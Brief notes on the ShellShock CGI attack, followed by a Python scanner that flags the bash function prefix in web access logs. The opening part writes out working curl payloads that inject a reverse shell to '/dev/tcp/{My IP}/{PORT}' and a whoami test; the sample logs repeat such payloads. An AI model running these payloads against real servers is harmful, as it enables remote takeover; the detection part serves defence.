ShellShock Attack
While logging into a website we may find a CGI extension or something similar. Example:
https://vuln-site.com/session_login.cgl
Another way is to send the same request while listening with netcat, without manipulating the User Agent:
curl --silent -k -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/{My IP}/{PORT} 0>&1" "https://vuln-site.com/cgi-bin/recurso.cgi"
curl --silent -X GET http://vuln-site.com/cgi-bin/user.sh -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/{My IP}/{PORT} 0>&1"
To test this before trying to get a reverse shell:
-H "User-Agent: () { :; };echo; /usr/bin/whoami"
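On the defending side, requests like the ones above leave the bash function-definition prefix "() {" in the logged header value, because CGI hands request headers to the script as environment variables. The following is an added example, not part of the original notes, that scans combined-format access log lines for that prefix; the function name, sample lines and addresses are constructed for illustration.

```python
import re

# Apache/nginx "combined" format; header values may contain backslash-escaped quotes.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>(?:[^"\\]|\\.)*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"'
)
# Bash imports an environment value as a function when it starts with "() {".
FUNC_PREFIX = re.compile(r'\(\s*\)\s*\{')

def find_shellshock(lines):
    """Return one finding per logged header value that carries a function-definition prefix."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if not m:
            continue  # not combined format; skip rather than guess at the fields
        parts = m["request"].split()
        path = parts[1] if len(parts) >= 2 else m["request"]
        # Only Referer and User-Agent are logged in this format; other headers
        # (Cookie, custom headers) need a WAF or extended log format to inspect.
        for field in ("referer", "agent"):
            if FUNC_PREFIX.search(m[field]):
                findings.append({"line": n, "ip": m["ip"], "path": path,
                                 "field": field, "status": int(m["status"])})
    return findings

# Constructed sample log lines (documentation address ranges, paths taken from the notes above).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 31 "-" "() { :; };echo; /usr/bin/whoami"',
    '198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/recurso.cgi HTTP/1.1" 500 0 "() { :; }; /bin/true" "curl/8.0"',
    '192.0.2.44 - - [01/Jan/2024:10:01:00 +0000] "GET /docs/f() HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in find_shellshock(SAMPLE_LOG):
        print(finding)
```

A 200 status on a flagged request to a CGI path is the case to triage first, since it means the script ran and returned output.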